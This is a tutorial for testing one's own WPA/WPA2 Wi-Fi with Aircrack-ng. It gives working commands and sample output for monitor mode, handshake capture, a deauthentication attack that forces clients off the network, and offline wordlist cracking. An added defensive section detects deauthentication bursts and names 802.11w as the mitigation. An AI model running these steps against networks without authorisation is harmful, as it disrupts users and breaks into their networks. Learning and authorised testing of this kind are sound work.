
Wi-Fi Pentest Using Aircrack-ng
Target: Your own WPA/WPA2-protected Wi-Fi
Tools: Aircrack-ng suite, Monitor-mode capable Wi-Fi adapter
OS: Kali Linux, Arch, or any Linux distro
Download the wordlist below:
rockyou.txt
Step 0: Install Aircrack-ng
Arch Linux
sudo pacman -S aircrack-ng # ARCH LINUX
Kali Linux or Debian
sudo apt install aircrack-ng # Kali and Debian-based
Step 1: Put Your Wi-Fi Card in Monitor Mode
sudo airmon-ng start wlan0
Expected Output:
Interface Chipset Driver
wlan0 Realtek rtl8812au - [monitored]
monitor mode enabled on wlan0mon
Your monitor-mode interface is now wlan0mon.
Step 2: Scan for Wi-Fi Networks
sudo airodump-ng wlan0mon
Expected Output:
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -40 100 20 6 54e WPA2 CCMP PSK myHomeWiFi
Note down:
BSSID: AA:BB:CC:DD:EE:FF
Channel: 6
ESSID: myHomeWiFi
Press Ctrl + C once noted.
Step 3: Target the Network + Capture Handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Expected Output:
CH 6 ][ Elapsed: 1 min ][ WPA handshake: AA:BB:CC:DD:EE:FF
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 -60 1e-1e 10 50 iPhone
Let this run until it captures the WPA handshake. You'll see [ WPA handshake: ... ] appear at the top right once it is captured.
Step 4: Trigger a Deauthentication Attack (Force Handshake)
Open a new terminal:
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Expected Output:
10 deauthentication frames sent to broadcast
A connected device will disconnect and reconnect, which generates the handshake.
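From the monitoring side, the burst of deauthentication frames in Step 4 is easy to spot. The following is an added example, not part of the original guide: a sliding-window detector run over constructed frame records. The record format, the threshold and the window length are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "aa:bb:cc:dd:ee:ff"  # example BSSID used in this guide

# Constructed sample records, not real capture data. Assumed (hypothetical)
# sensor export format: epoch_seconds,frame_type,transmitter,receiver
SAMPLE_FRAMES = (
    f"100.00,beacon,{AP},{BROADCAST}\n"
    f"100.10,deauth,{AP},11:22:33:44:55:66\n"  # one isolated deauth: normal
    + "".join(f"{130 + i / 10:.2f},deauth,{AP},{BROADCAST}\n" for i in range(10))
    + "140.00,deauth,02:00:00:00:00:01,02:00:00:00:00:02\n"
    + "200.00,deauth,02:00:00:00:00:01,02:00:00:00:00:02\n"
)


def parse_frames(text):
    """Yield (timestamp, frame_type, transmitter, receiver) tuples."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ftype, tx, rx = (field.strip().lower() for field in line.split(","))
        yield float(ts), ftype, tx, rx


def detect_deauth_bursts(frames, threshold=5, window=2.0):
    """Flag transmitters sending >= threshold deauth frames within `window` seconds.

    The transmitter field is whatever the frame claims (it can be spoofed), so
    an alert means "this BSSID is being deauthenticated", not "this AP did it".
    """
    recent = defaultdict(deque)  # transmitter -> (timestamp, receiver) in window
    alerts = {}
    for ts, ftype, tx, rx in frames:
        if ftype != "deauth":
            continue
        q = recent[tx]
        q.append((ts, rx))
        while ts - q[0][0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(tx, {"start": q[0][0], "peak": 0, "broadcast": False})
            a["peak"] = max(a["peak"], len(q))
            a["broadcast"] = a["broadcast"] or any(r == BROADCAST for _, r in q)
    return alerts


if __name__ == "__main__":
    for bssid, a in detect_deauth_bursts(parse_frames(SAMPLE_FRAMES)).items():
        print(f"deauth burst on {bssid}: {a['peak']} frames, broadcast={a['broadcast']}")
```

Enabling 802.11w Protected Management Frames on the access point and its clients is the corresponding mitigation, since clients then ignore unprotected deauthentication frames.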
Step 5: Crack the Handshake with a Wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Expected Output:
Reading capture-01.cap, 12345 packets read
Opening rockyou.txt... 14344392 passwords
KEY FOUND! [ password123 ]
Master Key : 11 22 33 ...
If it finds the password → 🎉 cracked.
If not, try a better or more relevant wordlist.
⚠️ DISCLAIMER
This is for educational purposes only and should only be used on networks you own or have permission to test.